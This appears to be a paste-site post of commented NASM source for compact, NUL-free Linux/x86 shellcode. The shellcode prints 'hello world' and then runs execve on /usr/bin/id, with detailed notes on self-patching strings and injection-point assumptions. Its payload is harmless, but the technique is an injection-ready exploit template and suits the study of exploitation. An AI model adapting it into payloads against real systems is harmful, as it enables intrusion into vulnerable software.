dRxL

61 byte shellcode

May 14th, 2013
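  [bits 32]                             ; NASM syntax, flat binary (nasm -f bin)
; ---------------------------------------------------------------------------
; Linux/x86 (i386, int 0x80 ABI) shellcode, NUL-free, 65 bytes when assembled.
;
; Executes, in order:
;   1. write(STDOUT_FILENO, "hello world\n", 12)
;   2. execve("/usr/bin/id", {"/usr/bin/id", "-u", NULL}, NULL)
;
; Both syscalls share a single `pop ecx / pop ebx / int 0x80` sequence
; (syscall_entry); the stage that jumps into it is responsible for having the
; right values on the stack and in eax/edx.
;
; Change vs. the 61-byte original: argv[1] ("-u") is now NUL-terminated inside
; the payload (`mov [ecx + 2], dl` plus one placeholder byte in the string
; table).  The original relied on whatever byte happened to follow the payload
; in memory being zero, which holds for a C string buffer but not for an
; arbitrary injection point; a non-zero byte there turns argv[1] into "-u<junk>".
;
; Assumptions the caller must satisfy:
;   * The payload sits in WRITABLE memory (stack/heap buffer, or a .text made
;     writable).  A NUL-free payload cannot carry its string terminators, so it
;     patches its own string table at run time; in a read-only mapping the
;     `mov [...], dl` stores fault with SIGSEGV.
;   * fd 1 is open and write() returns the full 12 bytes.  The execve syscall
;     number is derived from that return value (12 - 1 == 11), `cdq` relies on
;     it being non-negative to yield edx == 0, and the pointer arithmetic uses
;     2*eax.  A short or failed write (negative -errno) derails stage 2.
;   * NOTE(review): at the second `int 0x80` the argv array lies just below esp
;     (the two pops moved esp above it).  A signal frame delivered in the window
;     between `pop ebx` and `int 0x80` would overwrite it; this is inherent to
;     the shared pop/pop/int trick and is accepted here for size.
; ---------------------------------------------------------------------------

SYS_WRITE     equ 4                     ; i386 syscall numbers (asm/unistd_32.h)
SYS_EXECVE    equ 11
STDOUT_FILENO equ 1
MSG_LEN       equ 12                    ; strlen("hello world\n")

        push    byte SYS_WRITE
        pop     eax                     ; eax = 4 in 3 NUL-free bytes (mov eax,4 would contain NULs)
        lea     edx, [eax + eax*2]      ; edx = 3*eax = MSG_LEN; lea avoids a 32-bit immediate with NULs
        push    byte STDOUT_FILENO      ; write() fd, popped into ebx in syscall_entry
        jmp     short string_table      ; jmp/call/pop: the call below yields &msg on the stack

syscall_entry:
        ; Stack on entry (top first):
        ;   pass 1 (from string_table):  &msg, STDOUT_FILENO       -> write(1, msg, 12)
        ;   pass 2 (from stage 2 below): &argv, argv[0]            -> execve(argv[0], argv, NULL)
        pop     ecx                     ; pass 1: buf      / pass 2: argv
        pop     ebx                     ; pass 1: fd       / pass 2: filename
        int     0x80                    ; eax (nr) and edx (arg 3) set up by the jumping stage

        ; ---- stage 2: only reached after write(); eax = 12, ecx = &msg, edx = 12 ----
        cdq                             ; edx = 0 (eax >= 0): execve envp, and our source of NUL bytes
        push    edx                     ; argv[2] = NULL
        lea     ecx, [ecx + 2*eax]      ; ecx = msg + 24 -> "-u"
        mov     [ecx + 2], dl           ; msg[26]: placeholder '#' becomes the NUL after "-u"
        push    ecx                     ; argv[1] = "-u"
        dec     ecx                     ; ecx = msg + 23 -> the ' ' after "/usr/bin/id"
        mov     [ecx], dl               ; overwrite the space: NUL-terminates "/usr/bin/id"
        dec     eax                     ; eax = 11 = SYS_EXECVE (relies on MSG_LEN - 1 == 11)
        sub     ecx, eax                ; ecx = msg + 12 -> "/usr/bin/id"
        push    ecx                     ; argv[0] = "/usr/bin/id"
        push    esp                     ; &argv: esp before this push is the address of the argv[0] slot
        jmp     short syscall_entry     ; pops &argv -> ecx, argv[0] -> ebx, then execve

string_table:
        call    syscall_entry           ; pushes &msg as its "return address"; control never comes back
msg:    db      "hello world", 0xa, "/usr/bin/id -u", "#"
        ; msg offsets: 0 "hello world\n" (12) | 12 "/usr/bin/id" (11) | 23 ' ' | 24 "-u" | 26 '#'
        ; The ' ' and '#' are placeholders that stage 2 overwrites with NUL at run time.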